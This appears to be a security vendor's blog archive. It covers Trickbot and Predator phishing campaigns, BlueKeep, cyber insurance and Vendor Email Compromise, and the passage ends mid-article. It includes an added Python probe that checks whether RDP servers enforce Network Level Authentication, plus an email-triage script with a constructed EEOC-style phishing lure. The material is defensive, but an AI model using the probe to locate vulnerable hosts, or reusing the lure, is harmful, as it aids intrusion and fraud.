Category Archives: For Business

SECURITY ALERT: Trickbot Launches BEC Attacks with Fake #MeToo Harassment Claims

Security researchers have observed and reported a Trickbot resurgence in the past few days. Trickbot now launches what the researchers describe as BEC attacks, carefully aimed at senior people within US-based organizations. Key people at the targeted organizations receive highly worrying emails claiming that a colleague has filed a sexual harassment complaint against them.

The emails purport to come from the U.S. Equal Employment Opportunity Commission (EEOC), exactly the authority that handles such complaints, and they look official enough not to arouse suspicion right away. The attackers behind this new Trickbot campaign are choosing their victims deliberately, from the upper tiers of businesses and organizations.

Here is how Trickbot aims to wreak havoc now and how to recognize it.

How Trickbot Launches BEC Attacks and What the Emails Look Like

Over time, Trickbot has achieved notoriety for its capacity to adapt and change strategy: it started out targeting the financial sector, then gained worm-like abilities to spread across networks, spoofed trusted brands such as Dropbox, and learned to disable Windows Defender. The attackers behind Trickbot have always been creative and knowledgeable, which is how Trickbot managed to surpass Emotet and become the biggest malware threat today.

In its newest tactic, Trickbot sends emails claiming to come from the U.S. Equal Employment Opportunity Commission about an alleged complaint made against the target by a colleague. To find out who has accused them of sexual misconduct in the workplace, the victim is told to open the email attachment.

[Image: screenshot of the fake Trickbot EEOC email, via BleepingComputer.com]

The attachment is named along the lines of Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc. That Word document is the delivery vehicle: opening it is what triggers the Trickbot infection of the victim’s machine, from which the attackers can move on to the rest of the organization’s network.

There are other signs that something is amiss in the new Trickbot campaign. Read carefully, the emails contain spelling mistakes and the other tell-tale signs that usually give fake emails away.

Sadly, this newest spear-phishing campaign has found a powerful emotion to exploit: fear. That is nothing new in itself, since every kind of social engineering attack works by exploiting common human emotions and drives.

But lately, hackers are really upping their game on this account: last week it was fake court subpoenas, today it is fake sexual harassment complaints.

How to Protect Yourself from This New Wave of Trickbot Attacks and Spear-Phishing in General

No matter how urgent and serious an email seems, do not click its links or open its attachments when it concerns something out of the ordinary. That sense of urgency and seriousness is exactly what the attackers are counting on.

Do not click links or open attachments until you have checked the validity of the email through an independent channel: contact the supposed sender by phone, in a fresh email thread or via their official social media accounts (using contact details you look up yourself, not ones taken from the suspicious message), ask your cybersecurity provider or, where appropriate, the police, or run the message through an email security tool that protects against BEC attacks.

Final Words

Personally, I am very saddened to see that Trickbot contributes to a #MeToo-like panic with this fake sexual harassment claims scare. I think that there is a pervasive and really damaging myth that the current campaign against sexism and harassment in the workplace can somehow make victims out of innocent men. While it is wise to never say never, this is highly unlikely, and decent people really do not have anything to worry about.

But the way Trickbot launches BEC and phishing attacks now is capitalizing on this damaging myth and is also helping to spread it, unfortunately. My advice to anyone, regardless of the exact nature of a worrisome email you are receiving, is to not believe anything until you investigate.

Stay safe!

The post SECURITY ALERT: Trickbot Launches BEC Attacks with Fake #MeToo Harassment Claims appeared first on Heimdal Security Blog.

SECURITY ALERT: Remain Vigilant for More BlueKeep Attacks That Can Impact Vulnerable Windows Machines

Almost six months ago, we were urging users to patch their systems because of a remote code execution vulnerability in Remote Desktop Services, through which attackers could connect to a target’s system over RDP. At that time (May 2019), Microsoft released a patch for CVE-2019-0708, the Remote Desktop vulnerability dubbed BlueKeep. Exploitation attempts can crash the target with the “blue screen of death”, potentially leading to a Game of Thrones “Red Keep” moment. The vulnerability was considered “wormable”, meaning that malware exploiting it could propagate from computer to computer without any user interaction.

We predicted that it could potentially produce the same amount of damage as the WannaCry ransomware and the older Conficker worm. A few days ago, security researcher Kevin Beaumont reported that his BlueKeep honeypots were being exploited in the wild. His finding was confirmed by Marcus Hutchins, the security researcher who stopped the WannaCry outbreak and who has studied the BlueKeep exploit in depth.

How was the BlueKeep exploit used?

Recently, a malicious group was spotted using the BlueKeep exploit module that the Metasploit team released in September, which was meant to let penetration testers and system administrators verify vulnerable systems. Attackers have been using it to break into unpatched Windows systems and install cryptocurrency miners.

But even though these attacks may seem insignificant compared to what had been foreseen, right now, the Microsoft security team is warning its customers that “the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners”.

“Security signals and forensic analysis show that the BlueKeep Metasploit module caused crashes in some cases, but we cannot discount enhancements that will likely result in more effective attacks. In addition, while there have been no other verified attacks involving ransomware or other types of malware as of this writing, the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners.”- Microsoft’s Security Blog

In other words, although many security researchers thought that the attacks were not as bad as everyone believed they would be, Microsoft supports the idea that this is merely the beginning and that danger most likely is still around the corner.

“Many of these unpatched devices could be unmonitored RDP appliances placed by suppliers and other third-parties to occasionally manage customer systems. BlueKeep can be exploited without leaving obvious traces, customers should also thoroughly inspect systems that might already be infected or compromised.”, said Microsoft.

Consequently, for the third time this year, Microsoft is once again urging its users to apply the patch. The second warning came as a reminder at the end of May 2019, when almost 1 million internet-connected computers were still vulnerable to CVE-2019-0708. As of now, around 750,000 endpoints are thought to still be affected by the BlueKeep vulnerability. Many other organizations have issued warnings in the past few months, including the NSA, the US Department of Homeland Security and the UK’s National Cyber Security Centre, advising companies to patch their outdated systems.
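Microsoft’s remark about unmonitored RDP appliances raises a practical question: which of your exposed RDP endpoints still accept unauthenticated connections? The Python script below is an added example for this post, not Microsoft’s, Metasploit’s or Heimdal’s code. It performs only the opening X.224 connection negotiation defined in MS-RDPBCGR (sections 2.2.1.1 and 2.2.1.2), asks for Standard RDP Security, and classifies the server’s answer: a reply of HYBRID_REQUIRED_BY_SERVER means Network Level Authentication is enforced, which Microsoft lists as a partial mitigation for CVE-2019-0708 because an attacker must authenticate before reaching the vulnerable code; an accepted Standard RDP Security negotiation, or a legacy reply carrying no negotiation data at all, means the pre-authentication path is reachable from the network. The three sample replies are constructed, not captured traffic. The probe() helper touches the network, so point it only at systems you are authorised to scan; it is an exposure check, not a vulnerability test, and no substitute for the patch.

```python
# Added example, not from the original post: minimal RDP security-layer probe.
# Layouts follow MS-RDPBCGR 2.2.1.1 (Connection Request) / 2.2.1.2 (Connection Confirm).
import socket
import struct

PROTOCOL_RDP = 0x00000000          # Standard RDP Security (no NLA)
PROTOCOL_SSL = 0x00000001          # TLS
PROTOCOL_HYBRID = 0x00000002       # CredSSP, i.e. Network Level Authentication

FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}
NLA_ENFORCING = {5, 6}             # failure codes that mean "authenticate first"


def build_connection_request(requested_protocols=PROTOCOL_RDP):
    """TPKT header + X.224 Connection Request + RDP_NEG_REQ (19 bytes in total)."""
    # RDP_NEG_REQ: type 0x01, flags, length (always 8), requestedProtocols; little-endian.
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    # X.224 CR: code 0xE0, DST-REF, SRC-REF, class option 0; LI counts everything after itself.
    x224 = bytes([0xE0, 0, 0, 0, 0, 0]) + neg_req
    x224 = bytes([len(x224)]) + x224
    tpkt = struct.pack(">BBH", 3, 0, 4 + len(x224))   # version 3, reserved, big-endian length
    return tpkt + x224


def parse_connection_confirm(data):
    """Interpret the server's X.224 Connection Confirm and say whether NLA is enforced."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT/X.224 response")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match the bytes received")
    li, code = data[4], data[5]
    if (code & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = data[11:5 + li]            # rdpNegData, if any, follows the six fixed CC bytes
    if not neg:
        # Servers predating protocol negotiation answer with a bare CC: Standard RDP Security only.
        return {"nla_enforced": False, "selected_protocol": PROTOCOL_RDP,
                "detail": "no rdpNegData (legacy server)"}
    neg_type, _flags, _length, value = struct.unpack("<BBHI", neg[:8])
    if neg_type == 0x02:             # RDP_NEG_RSP: server accepted one of the protocols we offered
        return {"nla_enforced": False, "selected_protocol": value, "detail": "RDP_NEG_RSP"}
    if neg_type == 0x03:             # RDP_NEG_FAILURE: server refused what we offered
        return {"nla_enforced": value in NLA_ENFORCING, "failure_code": value,
                "detail": FAILURE_CODES.get(value, "unknown failure code %d" % value)}
    raise ValueError("unexpected rdpNegData type 0x%02x" % neg_type)


def probe(host, port=3389, timeout=3.0):
    """Network-touching helper: negotiate with a live server you are allowed to scan."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request())
        return parse_connection_confirm(s.recv(1024))


# Constructed sample replies (not captured traffic) covering the three outcomes.
SAMPLE_NLA_REQUIRED = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 03 00 08 00 05 00 00 00")
SAMPLE_STANDARD_RDP = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 02 00 08 00 00 00 00 00")
SAMPLE_LEGACY = bytes.fromhex("03 00 00 0b 06 d0 00 00 12 34 00")

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], probe(sys.argv[1]))
    else:
        for label, reply in (("nla", SAMPLE_NLA_REQUIRED), ("std", SAMPLE_STANDARD_RDP), ("legacy", SAMPLE_LEGACY)):
            print(label, parse_connection_confirm(reply))
```

Run it with a hostname to classify one endpoint, or without arguments to see the three constructed replies decoded. A host that reports nla_enforced False and is reachable from outside your network is the one to patch (or take off the internet) first.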

A BlueKeep vulnerability summary

In case you missed it entirely or are only familiar with some parts of the story, in short, here is what you need to know about the BlueKeep vulnerability:

  • BlueKeep (or CVE-2019-0708) is a vulnerability in the Microsoft RDP (Remote Desktop Protocol) service.
  • It affects Windows 7, Windows Server 2008 R2 and Windows Server 2008; Microsoft also shipped out-of-band fixes for the out-of-support Windows XP and Windows Server 2003. Windows 8 and Windows 10 systems are not affected by this vulnerability.
  • Microsoft released the patches for the vulnerability in May 2019.
  • Although many researchers developed full-fledged BlueKeep exploits over the summer, no one made the code publicly available because it was considered to be too dangerous and could possibly be exploited by malicious actors, according to ZDNet.
  • In July 2019, a US company began selling a BlueKeep exploit to its customers only for penetration testing purposes.
  • In September, Metasploit published the first BlueKeep proof-of-concept exploit available for anyone.
  • Now, in October, malware creators have started using this BlueKeep Metasploit module in actual malicious campaigns.

Patch your vulnerable systems immediately!

The BlueKeep vulnerability only emphasizes the importance of updating and patching in a timely manner, just like our customers who apply Windows updates through our X-Ploit Resilience module do. Our technology has helped 99.5% of our users successfully deploy their patches in time and we are actively pushing the last 0.5% of them to update as soon as possible.


SECURITY ALERT: New Fake Subpoena Phishing Campaign Spotted, Installing Predator

A new twist to the classic phishing campaign has been observed in a recent string of emails targeting UK residents, and especially retail and insurance companies in the UK. This new twist claims that the targets have been subpoenaed and summoned to court within the next 14 days, providing a malicious link for details.

Once the curious victim clicks on the link in the fake subpoena phishing campaign, they become infected with Predator the Thief.

Predator the Thief is a particularly nasty info stealer malware, developed by Russian hackers and first discovered in February 2019. Since its initial spotting, Predator the Thief has changed delivery methods a few times, becoming very effective in reaching its targets.

This new fake subpoena phishing campaign targeting the UK is the latest trick up the Predator’s sleeve. After all, most of us can’t remain indifferent to an official-looking invitation to court. What if we’re sued or called to testify? Sadly, we’re compelled to check what it’s all about.

How Does the Fake Subpoena Phishing Campaign Work?

Like most phishing campaigns, this one impersonates a trusted brand, partner or institution in order to appear legitimate. Having earned the victim’s trust, the scammers attach a malicious file or a link to a legitimate-looking page. In classic credential phishing that page asks the victim to log in and the credentials go straight to the attackers, who use them to steal data and assets; in this campaign the link leads instead to a malware download, as described below.

Phishing, in general, is a social engineering technique that relies on how convincing the message is and on manipulating the victim’s emotions (trust, fear, joy). In the case of the new fake subpoena phishing campaign, the emotion the attackers are trying to arouse is obviously alarm, or fear.

This is how the fake subpoena phishing campaign unfolds.

It starts with a spoofed email modified to look as if it’s coming from the UK Ministry of Justice. The message itself contains little info besides the notice that the victim has been subpoenaed and they need to comply within 14 days. This obviously creates a sense of urgency and panic, which can lead people to click the link without thinking too much.

[Image: sample fake subpoena phishing email]

The attackers in the new fake subpoena phishing campaign are also urging the victim to prepare all the documents requested of them in the link. One more incentive to click the malicious link.

Once a victim clicks the link, the Predator the Thief payload is delivered through a multi-step redirection chain of legitimate-looking pages. The Cofense researchers who discovered the campaign report that the Word document the user downloads at the end of the chain silently executes a first-stage downloader for Predator.

How Does the Infection with Predator the Thief Act on the Infected Device?

After a device becomes infected with Predator the Thief through the fake subpoena phishing campaign, the info stealer starts harvesting.

The Predator the Thief is an exceptionally dangerous stealer, conceived from the start with built-in self-obfuscating mechanisms that conceal part of its code at all times.

What kind of information does Predator steal? This is what researchers have noticed in the current campaign:

  • Credentials and other sensitive data;
  • Harvesting info from various local and cloud folders;
  • All files related to cryptocurrency wallets (.dat and .wallet files for Ethereum, Multibit, Electrum, Armory, Bytecoin and Bitcoin);
  • Cookies and stored credentials from a long list of browsers and applications (Chrome and Firefox, but also FileZilla, WinFTP, Steam and Discord among others, so gamers are targeted too);
  • Regular screen captures (screenshots).

Once the information has been gathered, it’s packed and sent to the C2 (command and control) server of the malware creators. The data package is sent via HTTP POST requests, alongside fingerprint data and sensitive network configurations.

After the data is sent, the Predator malware cleans up most of the infection’s traces and self-destructs. This makes it particularly difficult to detect and makes post-factum forensics less effective than they are when researching regular malware infections.

Furthermore, the creators of the Predator info stealer market it heavily in a MaaB (Malware as a Business) regime, on Telegram groups. They allow access to their malware for a low price, to anyone interested, along with an easy mode of use and even support when necessary. That means that virtually everyone can buy and use the Predator info stealer regardless of their technical skills.

Still, the people who are deploying it now, in the fake subpoena phishing campaign definitely know what they are doing. The pages look legit through and through and the message is well crafted to induce panic and compliance.

How to Stay Safe from this Phishing Campaign

I’ll end this post on the same note as all our anti-phishing advice. There are three things you can and must do to keep your business and personal data safe from Predator the Thief info stealers and others like it.

#1. Learn more about phishing.

We have several guides on how to recognize phishing and spear-phishing attempts, and there are plenty of other valuable resources online. Take time to read a bit every week and you’ll get better at detecting something amiss. Stay on guard.

#2. Have an active DNS traffic filter to block phishing links.

In today’s threatscape, you can’t be safe with Antivirus alone. You also need a reliable DNS traffic filter, especially if you have a business network to protect. A cutting-edge solution like our Thor Foresight Enterprise can block criminal infrastructures before they have time to deliver their payload via infected links.

#3. Stay skeptical and always double-check.

This new fake subpoena phishing campaign wouldn’t be successful if people would take time to investigate before clicking, instead of panicking. Know that phishing gets more and more frequent and creative, so maintain a critical view of everything you receive online.
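As a concrete version of the “investigate before you click” advice given here, in the Trickbot alert above and in the Silent Starling write-up further down, the Python script below is an added example (not Heimdal’s, Cofense’s or BleepingComputer’s code) that triages a raw .eml file rather than what the mail client chooses to display. It checks that Return-Path and Reply-To belong to the same party as From, that a display name claiming an institution actually comes from that institution’s domain, what your own gateway’s Authentication-Results say about SPF, DKIM and DMARC, whether an attachment has an extension that can carry a downloader, and whether a link’s visible text shows one host while its href points to another. The two messages are constructed for illustration with domains under .example and are not real samples; IMPERSONATED_ORGS and RISKY_EXTENSIONS are illustrative lists you would maintain yourself. Note that the lure deliberately passes SPF, because a lookalike domain registered by the attacker publishes its own SPF record: authentication results alone are not a verdict.

```python
# Added example (not from the original posts): triage a raw .eml for the tell-tale
# signs of a spoofed or lookalike lure.  Sample messages below are constructed.
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

RISKY_EXTENSIONS = {".doc", ".docm", ".xls", ".xlsm", ".js", ".vbs", ".hta", ".lnk", ".iso", ".zip", ".rar"}
# Assumption: institutions impersonated in these lures -> the domain they really send from.
IMPERSONATED_ORGS = {"equal employment opportunity": "eeoc.gov", "ministry of justice": "justice.gov.uk"}
# Good enough for mail bodies; a full HTML parser would be the next step.
LINK_RE = re.compile(r'<a\s[^>]*href=["\']([^"\']+)["\'][^>]*>(.*?)</a>', re.I | re.S)


def domain_of(header_value):
    """Domain of the first address in a header ('' if the header is absent)."""
    return parseaddr(str(header_value or ""))[1].rpartition("@")[2].lower()


def host_of(url_or_text):
    """Hostname of a URL, or of link text that looks like one."""
    return re.sub(r"^[a-z][a-z0-9+.-]*://", "", url_or_text.strip().lower()).split("/")[0]


def triage(raw_eml):
    """Return human-readable findings; an empty list means nothing stood out."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_eml)
    findings = []
    from_dom = domain_of(msg["From"])
    # Envelope sender and reply address should belong to the same party as From.
    for hdr in ("Return-Path", "Reply-To"):
        dom = domain_of(msg[hdr])
        if dom and dom != from_dom:
            findings.append(f"{hdr} domain {dom} differs from From domain {from_dom}")
    # A display name claiming an institution whose real domain this is not.
    display = parseaddr(str(msg["From"] or ""))[0].lower()
    for org, real_domain in IMPERSONATED_ORGS.items():
        if org in display and from_dom != real_domain:
            findings.append(f"display name claims '{org}' but address is on {from_dom}")
    # Results your own gateway stamped on the message (RFC 8601): anything but pass needs a look.
    auth = str(msg["Authentication-Results"] or "").lower()
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1) != "pass":
            findings.append(f"{mech} result is {m.group(1)}")
    # Attachment types that can carry a downloader (both campaigns above used .doc).
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if "." in name and "." + name.rsplit(".", 1)[1].lower() in RISKY_EXTENSIONS:
            findings.append(f"attachment {name!r} has a risky extension")
    # Links whose visible text shows one host while the href goes somewhere else.
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        for href, text in LINK_RE.findall(body.get_content()):
            href_host, text_host = host_of(href), host_of(re.sub(r"<[^>]+>", "", text))
            if "." in text_host and text_host != href_host:
                findings.append(f"link text shows {text_host} but points to {href_host}")
    return findings


# Constructed lure in the style of the EEOC campaign: a lookalike sending domain (so SPF
# passes), a Word attachment and a link whose text hides the real destination.
SAMPLE_LURE = b"""Return-Path: <bounce@eeoc-notice.example>
Authentication-Results: mx.victim-corp.example; spf=pass smtp.mailfrom=eeoc-notice.example; dkim=none; dmarc=none
From: "U.S. Equal Employment Opportunity Commission" <complaints@eeoc-notice.example>
Reply-To: <case-desk@reply-desk.example>
To: <jane.doe@victim-corp.example>
Subject: Harassment complaint filed against you
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>A complaint has been filed against you. Review it at
<a href="http://eeoc-gov.case-portal.example/view">https://www.eeoc.gov/complaints</a> within 14 days.</p></body></html>
--b1
Content-Type: application/msword; name="Jane_Doe - Harassment complaint letter.doc"
Content-Disposition: attachment; filename="Jane_Doe - Harassment complaint letter.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

# Constructed internal message that should yield no findings.
SAMPLE_CLEAN = b"""Return-Path: <hr@victim-corp.example>
Authentication-Results: mx.victim-corp.example; spf=pass; dkim=pass header.d=victim-corp.example; dmarc=pass
From: HR <hr@victim-corp.example>
To: <jane.doe@victim-corp.example>
Subject: Updated holiday calendar
Content-Type: text/plain; charset="utf-8"

The holiday calendar is now on the intranet.
"""
```

Calling triage(SAMPLE_LURE) reports the mismatched Reply-To, the display name on the wrong domain, the missing DKIM and DMARC, the .doc attachment and the link to eeoc-gov.case-portal.example, while triage(SAMPLE_CLEAN) returns an empty list. Treat the output as a list of things to verify through an independent channel, not as an automatic verdict.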

If you have any doubts about a domain or email or link, you can always send it to us at support@heimdalsecurity.com and we’ll get back to you with a verdict right away. Stay safe!


Cyber Insurance: Should You Consider It For Your Company?

In the wake of the frequent cyber-attacks affecting businesses, cyber insurance has become a highly researched and debated topic. The industry has been growing steadily for a couple of decades. According to Zion Market Research, the global cyber insurance market is expected to reach $22.8 billion by 2024, a compound annual growth rate of about 24%.

In spite of the high availability of cybersecurity protection and prevention tools, there still might be a chance for a company to become a data breach victim. However, this doesn’t mean measures such as employee training and cybersecurity solutions should be left behind. By all means, you should not be relying solely on reactive practices, like buying insurance policies. It’s always better to prevent a cyber disaster than deal with the consequences.

But what does cyber insurance cover? Is it worth investing in cyber insurance? These questions may have crossed your mind, so, in this article, I’m going to try to give answers to some burning questions and help you decide if or which cyber insurance providers may be right for your organization.

What is Cyber Insurance?

First things first, let’s start off with a definition of cyber insurance.

Cyber insurance is a type of insurance for businesses against digital threats. It is also commonly known as cyber risk or cyber liability insurance.

With so many cyber dangers threatening companies, no wonder it has become a highly popular service for organizations large and small around the world. But if you do decide to invest in cyber insurance, are you fully aware of what it’s all about?

Keep on reading to find out.

Why do companies generally purchase cyber insurance policies?

And how many organizations out there are actually covered by cyber insurance? According to Spiceworks data, 38% of organizations are covered by a cyber-insurance plan, with nearly half having had a policy for under 2 years, 32% for 3-4 years, and 24% having been covered for 5+ years.

[Image: cyber insurance statistics on how long organizations have been covered. Source: Spiceworks study]

What’s more, 71% of survey respondents stated that they purchased a policy for precautionary reasons. This seems to be the top driver for organizations to get coverage, followed by an increased priority on cybersecurity (44%), handling a high volume of personal data (39%), and industry-specific regulations (28%). On top of that, only 14% seem to have bought insurance coverage due to customer requirements and an additional 14% as a result of new data protection regulations, such as GDPR. Additionally, IT professionals admit to choosing cyber insurance coverage just to get some peace of mind and hope they never use it.

[Image: cyber insurance statistics on reasons for purchasing coverage. Source: Spiceworks study]

What does cyber insurance cover?

Cyber risk is without a doubt one of the most difficult aspects to deal with as it has a high impact on both societies and businesses worldwide. Cyber insurance plans are typically created with digital risk in mind in order to ensure (in the best way they can) the continuity of a business and ultimately enable companies to become cyber resilient.

However, not all cyber insurance policies are created equal. Sometimes, decision-makers may be tempted to choose low-price services and end up with a bad deal. This typically happens because in some cases, cyber insurance providers trying to safeguard their existence in the face of harsh competition, tend to create packages that leave high-risk areas uncovered. Why does this happen, you may be wondering. Because some cyber insurance vendors are inexperienced in cybersecurity and don’t fully understand an organization’s actual needs in the current threatscape.

Before deciding to purchase a cyber-insurance policy, you will want to know exactly what it covers so that you can assess whether a particular insurer is a good fit for your company. Evaluate your options carefully.

A Cyber insurance coverage checklist

Here are the main items typically covered by cyber insurance policies:

  • Restoration of data and software damaged or destroyed by malware (viruses, spyware, worms, etc.)
  • Extortion losses (ransomware)
  • Setting up a temporary environment so your company can continue to operate
  • Business interruptions that resulted directly from a cyber-attack (such as DDoS attacks)
  • Temporary security experts hired to defend your company against the attack
  • Legal expenses and fees
  • Costs of notifying employees and the public
  • Costs associated with reputation damage

What does cyber insurance NOT cover?

Even though your cyber insurance may fix some of your post-cyberattack problems, keep in mind that it will not sort everything out. Below are some aspects that are (usually) not covered:

  • Physical property loss and damage

Normally, cyber insurance coverage excludes physical loss that happened as a direct result of a cyber-attack. Think of manufacturers and energy suppliers, which are more likely to be hit by cyber-attacks intended to cause physical damage. If machines are destroyed because malicious hackers took control of them, the losses will not be covered by cyber insurance; they would most likely fall under other types of business insurance, such as crime insurance.

  • Social engineering attacks

Oftentimes, cyber insurance policies contain social engineering reduction clauses. Some sources mention a payout reduction if employees fall victim to social engineering attacks. For instance, according to one city government, “they had a $50-million-dollar cybersecurity insurance policy, but if a claim involved social engineering, then it only paid out a maximum of $200,000.” Customers who are unaware that 70% to 90% of all successful data breaches start with social engineering are potentially losing up to 90% of the coverage they expected to have.

What’s more, according to a report released by Mactavish, many insurance policies contain grey areas. Below you can see what they normally don’t cover.

  • They do cover attacks or hacks but exclude accidents and errors
  • They do cover costs imposed by law, but not total incident costs
  • They only cover the time of the network interruption, but not the overall business disruption moving forward
  • They may exclude systems delivered by third-party service providers
  • They may not cover software or systems currently in development
  • Policies may sometimes not cover incidents caused by contractors
  • Customers may not be able to choose their own IT, PR or legal specialist since the insurance policy only covers appointed advisors.

Thus, the points above would typically need to be negotiated before signing the insurance contract. Therefore, you really need to bear in mind these common exceptions when you are evaluating cyber insurance vendors and be sure you choose the plan that best matches your business and cybersecurity needs. And better yet, never put large amounts of money and your trust in cyber insurance policies and invest in proactive cybersecurity measures instead.

Is cyber insurance really worth it after all?

It depends on several factors. Ultimately, it is up to you to decide, according to your current business needs.

For instance, would it be better to spend $15,000 to buy a cyber insurance policy or to use that money to upgrade your current cybersecurity offering and train your employees to recognize and react at the first signs of cyber compromise? Or split the amount between these areas?

Oftentimes, cyber insurance may create a false sense of security, so be careful how much you actually invest in it and what items it includes. Also, keep in mind that after choosing a certain insurance policy, you should not just leave it there to gather dust indefinitely. In fact, your cyber insurance contract should be constantly reviewed and updated depending on your evolving needs and current cyber-threat dangers.

So, how much cyber insurance coverage do you really need?

On average, data breaches cost companies $150 per record, according to the IBM and Ponemon Institute 2019 Cost of a Data Breach Report, and the same study found that the average time to identify and contain a breach was 279 days. If you do decide to purchase a cyber insurance policy, these figures are good starting points.

You should take into consideration aspects such as:

  • How much sensitive information you store
  • Where is the sensitive information stored
  • What measures you would need to take if you experienced a data breach
  • What would the costs be to replace the damaged software (and perhaps hardware)
  • Do you have any employees trained to mitigate the damage, or do you need external security specialists?
  • Is there any PR staff able to deal with crisis management if you experienced a data breach?

Answering these questions, and others you formulate yourself based on your own business model, will give you an idea of how much insurance coverage you would need in an emergency.

Should you replace cybersecurity with cyber insurance?

No, never! Cyber insurance should never be used, under any circumstances, as a cybersecurity replacement. Do not operate with the it-won’t-happen-to-me mentality and try to cut down costs associated with security tools. You may “save” some money for a while, but in the long run, this practice will only damage your business.

Cyber insurance and ransomware payouts, a controversy

Some cyber-insurance companies seem to encourage ransomware victims to pay the ransom. Apparently, this practice is seen as the cheapest way to reverse ransomware attacks and at the same time ensure the least downtime possible. And this happens despite warnings and discouragement from law enforcement agencies that are saying “ransoms shouldn’t be paid because they fund criminal activity.” What’s more, in the past, we saw ransomware strains that deleted data even if the victims paid, so the ransomware payment behavior certainly comes as a red flag. Sadly, the main goal of insurance companies here is to get the issues resolved at the lowest price possible.

What should companies do instead of paying the ransom? Use the proper cybersecurity tools, apply system and software updates as soon as they are released, and always back up their sensitive data.

Bottom Line

Even though no organization will be completely safe from cyber-attacks and even if cyber insurance does offer you protection to some extent, it’s never advisable to rely solely on it. So, make sure that you invest in the right proactive cybersecurity tools, systems, and procedures alongside your employees’ cybersecurity training. And only then, if you choose to, create a cyber insurance plan tailored to your company and be certain it gets constantly revised and updated.


Vendor Email Compromise (VEC): The Classic Business Email Compromise (BEC) Scheme with a Spin

A new email fraud scheme has taken Business Email Compromise (BEC) to a whole new level of sophistication. The recently discovered type of email scam has been dubbed Vendor Email Compromise (VEC) and, as its name suggests, the attackers prey on employees working at vendor companies.

A new cybercriminal group, identified as Silent Starling by researchers at Agari, ran these malicious email campaigns. The fraudsters compromised the email accounts of employees in vendors’ finance departments and gathered as much information as they could from their inboxes. Then they sent the vendors’ customers perfectly timed payment requests accompanied by fake invoices.

Since late 2018, over 700 employee accounts from more than 500 companies in the United States and over a dozen other countries have been compromised. Consequently, more than 20,000 sensitive emails have been harvested. 

Vendor Email Compromise, a new milestone in the evolution of BEC attacks 

Traditionally, a BEC attack is based upon what is commonly referred to as CEO fraud or the impersonation of an upper or middle-management employee. In this case, fraudsters contact their “colleagues” from the financial department, requesting an urgent payment and providing all the necessary details for the money to be transferred. Since the email comes from a superior and the message is transmitted with a sense of urgency, employees are likely to fall for this scam, being completely unaware the money will end up in a cybercriminal’s account.  

And now, through this social engineering tactic, impostors are targeting a new niche: vendors.

More precisely, scammers are preying on employees working in a vendor’s finance department, with the ultimate goal of gathering intelligence on customers they interact with. 

Who are the attackers behind Silent Starling? 

The criminal group originates from West Africa and has been involved in fraudulent practices since 2015. First, they engaged in romance scams and check fraud and transitioned to BEC attacks in mid-2016, Agari writes. In their first two years of BEC, they focused on wire transfer requests and gift card attacks, only at the end of 2018 shifting their focus to VEC scams.  

Three main malicious actors belonging to the cyber-gang have been identified, but at least eight other group members may have been involved. Each of these individuals was in charge of certain tasks, such as collecting leads to be targeted, finding mule accounts, or hijacking and scanning compromised email accounts in search of relevant information.

How do Vendor Email Compromise attacks work? 

As I briefly mentioned above, both BEC and VEC scams are based on social engineering. What sets them apart is that VEC attacks target a supplier’s customers, who receive realistic-looking payment requests for an actual service they are expecting to pay for.

But how do VEC scams actually work? 

Since they are highly elaborate schemes, they are conducted through multiple stages. Below you can see the main phases of Vendor Email Compromise attacks: 

Attack phase   Description
Phase 1        First phishing wave (target: vendors)
Phase 2        Account takeover
Phase 3        Inbox monitoring
Phase 4        Second phishing wave (target: the vendors’ customers)

Phase #1. Credential stealing through phishing campaigns 

The phishing emails sent by the Silent Starling group pose as popular business applications, a practice commonly employed by cybercriminals. For instance, only a few days ago we discovered yet another Microsoft phishing campaign targeting Office 365 users.

Going back to Silent Starling’s malicious emails, the websites they used imitate Microsoft OneDrive and DocuSign login pages, as well as voicemail and fax notifications.

[Images: two Silent Starling phishing page samples. Source: Agari.com]

The attackers have reportedly used over 70 phishing websites to harvest the users’ credentials. They managed to intercept the login details for more than 700 employees at over 500 companies in 14 countries. The main countries where the attacks were conducted were the United States, Canada, and the United Kingdom.  

But who falls for these email scams in the first place, you may be wondering? Well, the ones who have not received a basic cybersecurity training may click malicious links and enter their login credentials without checking if the sender and landing page are legitimate. What’s more, they are not using the proper tools to protect their business from phishing attacks. 

Apparently, at a single US-based company, the accounts of 39 employees were compromised. The phishing campaign ran between September 2018 and March 2019, as reported by Agari. The credentials of people in various business functions, such as billing, sales, HR and senior executives, were stolen in these campaigns.

In one of the phishing waves that targeted the above-mentioned company, 13 email accounts were compromised within thirty minutes of the emails being sent. Furthermore, at least six employees also had their personal email account credentials compromised. Most likely, this happened because employees made the common mistake of reusing the exact same passwords (or slight variations) for both their corporate and personal accounts, which allowed the attackers to practice credential stuffing.

Phase #2. Taking over the compromised accounts 

During this stage, first of all, the attackers would access the employees’ hacked accounts and look for significant vendors who could be impersonated. 

